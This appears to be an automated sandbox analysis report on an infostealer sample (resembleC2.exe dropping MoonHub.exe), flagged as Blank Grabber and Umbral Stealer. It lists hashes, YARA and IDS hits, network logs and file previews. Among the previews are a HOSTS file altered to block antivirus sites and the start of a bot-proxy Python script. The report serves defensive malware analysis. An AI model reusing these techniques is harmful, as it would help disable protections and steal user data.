                                                                                                                                                                              SHA-512:E54CCB56AA6473ABD3530493933D5164F2DFF02076E0F03443382F02D177A52E318D8D0F432E6A3FB5620EAFFD09F2DBF6CCBF9698BA149B149C594FA162D879
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1965
                                                                                                                                                                              Entropy (8bit):5.377802142292312
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                                                                              MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                                                                              SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                                                                              SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                                                                              SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46080
                                                                                                                                                                              Entropy (8bit):5.780577504954653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:c8vWwhHzlJbzOuumn30yUMsP4euzkTvObyRNwZAf8VYEqQr9w3NGuDgN:PlJbFo7ObIeCfCqQr9cGu8
                                                                                                                                                                              MD5:8C7D2F0A936DBE6D0899D40171FFB668
                                                                                                                                                                              SHA1:0B22FCD904F3B0FA2555A32A2635423668FC4616
                                                                                                                                                                              SHA-256:85F5F5ACB54C30EFD4F84C0F11C834B7DAB98C5BB7357BDDCD29FBE5BABC4DB6
                                                                                                                                                                              SHA-512:463A48EC2752FD002E82DFE555ABD03FC666A523DA99E0E848788EEFF6F98D06D36A360CFD7AD70D342BB4C90A49131A3428F1404D17E04A7FE5A1022C1FAA65
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):656460
                                                                                                                                                                              Entropy (8bit):7.998181014172452
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:12288:3aq9YUnlkphkJjLnAX/jc/ISC1MfvR6UEbkjlbPkxKtjNfZxSVbUtsnOjKnWSo+S:q219fnw/4/IpWIU6IbPkOfZxaiAZXojh
                                                                                                                                                                              MD5:6412D4CEC5064C94E1AC4BE2B0C24B79
                                                                                                                                                                              SHA1:5B2E97D870F725807025C814605DE2F0807B6577
                                                                                                                                                                              SHA-256:B7D93B3AA08B3568C7E6A3C5AD5A2102E1D2086CF3636703CB7F808713DFBFA4
                                                                                                                                                                              SHA-512:5AD6A0E3E1400BBEE32315894D633ED3B1DDC0C63893DA4AFFAE54DC66919D343478E97F7C7EAB3C0B875161AAA0CAB9A455FD022D8635B2B0F8FE4FB9BDE3FC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                              Entropy (8bit):5.76524051718901
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                                                                                                                                                              MD5:B11F445211C21DB45D7B779A5C6E2444
                                                                                                                                                                              SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                                                                                                                                                              SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                                                                                                                                                              SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):674763
                                                                                                                                                                              Entropy (8bit):7.922612762784588
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:wR3YXWAGGfaxAePF7BzD4ujV62R41jdbThXyPz+c+TAPUL3jI:w5DAxMFfJj9RqjfXy0Tb0
                                                                                                                                                                              MD5:6D87AD1484D58A350C0F5D2DA218F3D6
                                                                                                                                                                              SHA1:29D5AC0B2C5252FD275DC021F8E25910513B78C2
                                                                                                                                                                              SHA-256:D98898C1F8E7877E99B6C5C02C2ED23247320011E924CC0D3CD3191F5CA71928
                                                                                                                                                                              SHA-512:D24A8FD183330FD890D93CFAA3010D84D8285D46B1E3D4E7915155C1BDAD6E9386C2449E82E1DB8A6C95036626FA5297BB48E0B895B89D1DAA48FB8C142F3364
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):236544
                                                                                                                                                                              Entropy (8bit):6.082686262892605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4+Ocip3cw/oeHp0AVO0b8e1mMi:DoZtL+EP8+Ocip3cw/oeHp0AVji
                                                                                                                                                                              MD5:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              SHA1:577883BDBE8DC9582E15E7A1212B1FE432BAFCE3
                                                                                                                                                                              SHA-256:8FD22C5ACB3144DBAA5AB3F9DD5901EB6F3BEEF67E72EA431246C6A790C067DE
                                                                                                                                                                              SHA-512:E54CCB56AA6473ABD3530493933D5164F2DFF02076E0F03443382F02D177A52E318D8D0F432E6A3FB5620EAFFD09F2DBF6CCBF9698BA149B149C594FA162D879
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):0.8439810553697228
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):28121
                                                                                                                                                                              Entropy (8bit):4.8038189354230125
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:km+8AsdePeeKRU4fDUfgOwbxqTFRUbtf3w1KQcRUb6f3w1KQ3RUbjf3w1KQgRUbA:kmlUDv6db
                                                                                                                                                                              MD5:23F1FABAEF532D89FCB6D5BB14A36EF3
                                                                                                                                                                              SHA1:679A82ED172D49F298BF07B6FA0DE9B6C2CE0046
                                                                                                                                                                              SHA-256:E4410BC67B1EE8AF2DF456713B85040917B8CF749FB7D660FEEB625B25EC9C51
                                                                                                                                                                              SHA-512:96E2BAA6CE0220B9AD167B60220C683D5B080A9BA9A2E4D320AAE6989F4AA2D241F8078E69BDD2DA39A20D9B57AE84240DA912D29E5E1DB36CC90CF6A0537458
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:import sys.import socket.import time.import random.import threading.import getpass.import os.import urllib.import json..def clear():. os.system('cls' if os.name == 'nt' else 'clear')..proxys = open('proxies.txt').readlines().bots = len(proxys)..def ascii_vro():. clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;79;3;255m[\x1b[38;2;0;255;255m.].'''). time.sleep(0.5). clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;79;3;255m[\x1b[38;2;0;255;255m.\x1b[38;2;3;248;255m.\x1b[38;2;79;3;255m].'''). time.sleep(0.5). clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;0;0;255m[\x1b[38;2;0;255;255m.\x1b[38;2;3;248;255m.\x1b[38;2;51;255;255m.\x1b[38;2;0;0;255m].'''). time.sleep(0.5). clear(). print(f
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2223
                                                                                                                                                                              Entropy (8bit):4.573013811987098
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                                                                                                              MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                                                                                                              SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                                                                                                              SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                                                                                                              SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.924806968142661
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              File name:resembleC2.exe
                                                                                                                                                                              File size:131'072 bytes
                                                                                                                                                                              MD5:4c8044c83f60465eae3cc16d7c858085
                                                                                                                                                                              SHA1:bc837ba36a8f244283483210215a11607f05fb63
                                                                                                                                                                              SHA256:331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
                                                                                                                                                                              SHA512:f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432
                                                                                                                                                                              SSDEEP:3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8
                                                                                                                                                                              TLSH:B8D3128892D4C236CD5D8BBBD566A5644179F7579E2B2F2B0A3480FC8D0F246C2F79C2
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g................................. ... ....@.. .......................`............@................................
                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                              Entrypoint:0x42152e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x67834DCB [Sun Jan 12 05:06:19 2025 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x214e0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x4e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1f534 | 0x1f600 | f6d5210f5ee162ad4b3bc08c072c5d63 | False | 0.963948891932271 | data | 7.96053442320482 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x22000 | 0x4e8 | 0x600 | eeda644f669313124e030936f6cc081c | False | 0.3743489583333333 | data | 3.742189295588293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x24000 | 0xc | 0x200 | f497f2ef3b6e61c96416a472ac9272fd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x220a0 | 0x254 | data | | | 0.46140939597315433
RT_MANIFEST | 0x222f8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T07:11:02.890379+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49947 | 208.95.112.1 | 80 | TCP
2025-01-12T07:11:29.966839+0100 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 50018 | 162.159.135.232 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Jan 12, 2025 07:10:44.722374916 CET4984011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:44.722687006 CET4984011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:44.727435112 CET110574984018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:46.350620985 CET110574984018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:46.350853920 CET4984011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:46.573195934 CET4984011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:46.574001074 CET4985111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:46.578133106 CET110574984018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:46.578948021 CET110574985118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:46.579057932 CET4985111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:46.585228920 CET4985111057192.168.2.518.153.198.123
